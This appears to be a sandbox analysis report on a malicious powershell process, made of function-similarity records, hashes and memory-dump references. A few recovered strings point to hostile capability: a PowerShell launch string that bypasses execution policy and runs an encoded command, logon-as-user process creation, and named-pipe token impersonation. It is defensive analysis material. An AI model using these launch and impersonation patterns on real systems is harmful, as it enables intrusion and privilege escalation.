                                                                                        • API String ID: 310312816-0
                                                                                        • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                                                        • Instruction ID: 3c516d88013cbbc0f2baa1bf7d7b8b551497970a57579ef24255a124f61a6230
                                                                                        • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                                                        • Instruction Fuzzy Hash: 2A21F07A702680C6FB16EF6DD8413ED7692BBA37A1F1D4114AA150B3D3CBB888498353
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 4140391395-0
                                                                                        • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                                                        • Instruction ID: a3a58b679a082305660e9b8703ebeba84318d06abbca057bd576867ec8e70f4e
                                                                                        • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                                                        • Instruction Fuzzy Hash: 1121CF7A702580D6F716EB2D98053ED7652BBA3BB1F5D4714AE390B3D3C73884498722
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno
                                                                                        • String ID:
                                                                                        • API String ID: 2288870239-0
                                                                                        • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                                                        • Instruction ID: 4b8bfbfb8214cbce064c67648406251ba8dd481b820b9c6799ebec1778d54a14
                                                                                        • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                                                        • Instruction Fuzzy Hash: 3E316C3DB03644C9FE95DB0DE9553E823A0AFB7B64F2C09259A1917295CF38C44C8387
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                                                                                        • String ID: %s%s%s
                                                                                        • API String ID: 1671524875-1891519693
                                                                                        • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                                                        • Instruction ID: 411e4a99ac7a7d3384d461fe624920f7044d01f171329d8cdaebc54afb0fb685
                                                                                        • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                                                        • Instruction Fuzzy Hash: 8D41A53D706240C6FA14FB2AAA147EE6791B7A7BD0F5C4221AE6547796CF3CC04AC702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                                        • String ID:
                                                                                        • API String ID: 2611593033-0
                                                                                        • Opcode ID: 9d586237cfbf1f9382404945b490824def90faa684bf5ba584bc382ccd0c9597
                                                                                        • Instruction ID: e6e69c61f0953aba1f99e9cf639d835e4bc4c86b6dbae7cc1f84dd8506b08795
                                                                                        • Opcode Fuzzy Hash: 9d586237cfbf1f9382404945b490824def90faa684bf5ba584bc382ccd0c9597
                                                                                        • Instruction Fuzzy Hash: F121D436702240C6F705EF2D98413ED666067A3BE1F9D8215AE15473D3E7788449C763
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                                        • String ID:
                                                                                        • API String ID: 2611593033-0
                                                                                        • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                                                        • Instruction ID: ba442c84f49a6b28b1e562d6b92e6dc5ebf52929dc05253d047958734bbd03c4
                                                                                        • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                                                        • Instruction Fuzzy Hash: 6E21357AB02180C6F716EF2CD9413ED7651ABA3BA1F2D4124AA15073D3CB78C849C713
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 2289611984-0
                                                                                        • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                                                        • Instruction ID: 0696ba71714eab6246b445b379715ab1183ccedebe25fdfeafdbeb22b03dd8d3
                                                                                        • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                                                        • Instruction Fuzzy Hash: 4821573D303681C5F715EFAC9C803EC2661ABA3764F1D0118DA220B3D2CB38D849A357
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                                        • String ID:
                                                                                        • API String ID: 4060740672-0
                                                                                        • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                                                        • Instruction ID: 717b63df563f036b04009d633f52ffe8190fd29257b7b9cacc2021af72a68781
                                                                                        • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                                                        • Instruction Fuzzy Hash: B311E63A702284C5F719EF2DDC413EC6650A7A37E1F5D86249515473D7E6B484488352
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                                        • String ID:
                                                                                        • API String ID: 4060740672-0
                                                                                        • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                                                        • Instruction ID: 3e2932c82322211481e02cc327449e93d2d4212259e02e1778acf71364c0455c
                                                                                        • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                                                        • Instruction Fuzzy Hash: DB11E23A7032C0C6F316EF6D98853EC7691ABA3761F6D0724D916473D3C678D8498312
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$malloc$_errno$_callnewh
                                                                                        • String ID:
                                                                                        • API String ID: 4160633307-0
                                                                                        • Opcode ID: db69d602f1943cf1bf5e1787111993c61e1e003504124b10c032ff47382cd6cb
                                                                                        • Instruction ID: 666085d0b1086859bce7a7f27c4837f5d6ec9e8a457165469d8a5779b802c414
                                                                                        • Opcode Fuzzy Hash: db69d602f1943cf1bf5e1787111993c61e1e003504124b10c032ff47382cd6cb
                                                                                        • Instruction Fuzzy Hash: 55711A36306784CEEB92DB3A94407EE7791BBA6BC9F088414DF4607B85DB38C409CB12
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3534990644-0
                                                                                        • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                                                        • Instruction ID: ab9d733fb6d8a65804c78c09dfabc297ec54e2b639a9190f49d88f8d5fd3c1cd
                                                                                        • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                                                        • Instruction Fuzzy Hash: EB71023E3026C0CBEA60DB6E95447EA7791B7A7BC8F084125DD564BB86DB39C40AC702
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                                                                                        • String ID: /'); %s
                                                                                        • API String ID: 1314452303-1283008465
                                                                                        • Opcode ID: 230a710bdbc385172d0855d0a4b2ef21548c59b6f91c62af24776a2cde258627
                                                                                        • Instruction ID: ce26ba01abf5096307e3632d47fd8150b356232b9509cb49dc9f7a7e53336d38
                                                                                        • Opcode Fuzzy Hash: 230a710bdbc385172d0855d0a4b2ef21548c59b6f91c62af24776a2cde258627
                                                                                        • Instruction Fuzzy Hash: 04C1AF39702281CEFA95EBBE94517ED2291ABA7780F5C4824AF15573C7DE39C80E9703
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintf
                                                                                        • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                                                        • API String ID: 3512837008-1250630670
                                                                                        • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                                                        • Instruction ID: 22b005712d652bd5278567e09767a695c72a26b109ed0728238fbfd417e6c781
                                                                                        • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                                                        • Instruction Fuzzy Hash: 25819D3A702A45CAEB80DB69E8403DD33A1F7A6788F580522DB4D57796DF38C80DC742
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                                                                        • String ID: %s as %s\%s: %d
                                                                                        • API String ID: 3435635427-816037529
                                                                                        • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                                                        • Instruction ID: 1c8f96b3ffeb96047e8463c82c9e6a75dc3d676cc901ab1b13dd2ce91a7bfa84
                                                                                        • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                                                        • Instruction Fuzzy Hash: 51513B3A315B8186E760DF1AB84479EB7A5F796B80F584025EE8D43B59DF3CC05ACB01
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                                                                        • String ID: mode
                                                                                        • API String ID: 1756087678-2976727214
                                                                                        • Opcode ID: 402d5845c4a113310961eb109c64e08a8b0c88570c4d9bf59124b8cdcbb4eeee
                                                                                        • Instruction ID: e6b4dde87b5ef0d694d3f263bdf16199e4ac59b2bc831de173120d3d09d3a30c
                                                                                        • Opcode Fuzzy Hash: 402d5845c4a113310961eb109c64e08a8b0c88570c4d9bf59124b8cdcbb4eeee
                                                                                        • Instruction Fuzzy Hash: 1341F739306640CAEA50EB2AD4503ED6352B7EBBC0F588521AF5E57BD6DE3CC50D8702
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                                        • String ID: /'); %s
                                                                                        • API String ID: 761449704-1283008465
                                                                                        • Opcode ID: 46bc0b5ded448f9ef4667024c9d3f3f2e30065c16e9db5fefb9307cac72c765c
                                                                                        • Instruction ID: ce1a229f0b1ef6c64aafdc2033bd7b2065cb1e403cabc17a57410ccbdd60b389
                                                                                        • Opcode Fuzzy Hash: 46bc0b5ded448f9ef4667024c9d3f3f2e30065c16e9db5fefb9307cac72c765c
                                                                                        • Instruction Fuzzy Hash: 5931F57D30218188E695DB1A28103E9EB61776BFD0F9C4411DFE52B7D6CA38C84E9702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastOpenProcess$Token
                                                                                        • String ID:
                                                                                        • API String ID: 1476857506-0
                                                                                        • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                                                        • Instruction ID: bbe14702c0d6700b5d57ea39cbb66abcabd9afaaea1c24f700bf7d4ceab1189b
                                                                                        • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                                                        • Instruction Fuzzy Hash: 5431E63D317700C2FB60DB6AE4547DE6690ABA7B90F1C4039AE0543792DE3EC44E8742
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 2917016420-0
                                                                                        • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                                                        • Instruction ID: 63da68f120682861190321d2ca267578a235901d6248dd8da97197c683427da8
                                                                                        • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                                                        • Instruction Fuzzy Hash: E531E439302B41CAFB50DB2E98003DDA6D1ABABB94F2C4A24DE45437D6EF38C40C8306
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3191669884-0
                                                                                        • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                                                        • Instruction ID: 7110817bc7344c7bad23b5aae9904b93dc6273d283ccb81b203938208343c5a5
                                                                                        • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                                                        • Instruction Fuzzy Hash: 4D319C7A305784C6E760DB1994407DEA7A4F3ABBE0F1C8221AA5443BC6EB74C849C702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3191669884-0
                                                                                        • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                                                        • Instruction ID: 321f415032512a599b84e03abfb2762dacf89d1df0f448be5ee075413beb4ee4
                                                                                        • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                                                        • Instruction Fuzzy Hash: 1B318B7A306780C6E720DB19948479DB7A5F7A7BE0F584221AE9807BC5CB34C849C702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickioctlsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3686034022-0
                                                                                        • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                                                        • Instruction ID: 74e8b5a0855b3173f1b2512bc5c86a33575a118944a91f09c879f2cd6c354da2
                                                                                        • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                                                        • Instruction Fuzzy Hash: A211C43A701680C6F720CB6DE84439DB360E797BA4F590224DA59866E0DF7DC88E8712
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                                                                                        • String ID:
                                                                                        • API String ID: 4232080776-0
                                                                                        • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                                                        • Instruction ID: abd07d227eee375e8abb98b1069570429d7200c8e8b6d7d96925fde3d16b3b9b
                                                                                        • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
